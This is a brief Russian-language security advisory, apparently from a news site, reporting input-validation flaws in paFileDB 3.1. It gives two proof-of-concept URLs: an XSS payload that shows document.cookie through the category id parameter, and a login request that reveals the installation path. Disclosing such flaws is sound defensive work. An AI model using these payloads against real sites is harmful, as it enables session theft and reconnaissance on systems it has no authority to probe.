Программа: paFileDB 3.1 

Уязвимость в проверке правильности входных данных обнаружена в paFileDB. Удаленный пользователь может выполнить XSS нападение и определить инсталляционный путь. 

1. XSS: 

http://localhost/pafiledb.php?action=category&id=’ <script>alert(document.cookie);</script>

2. Раскрытие пути: 

http://site/includes/admin/login.php?formname= DarkBicho&formpass=DarkBicho&B1=
%3E%3E+Log+In+%3C%3C&action=  admin&login=do



Оставить мнение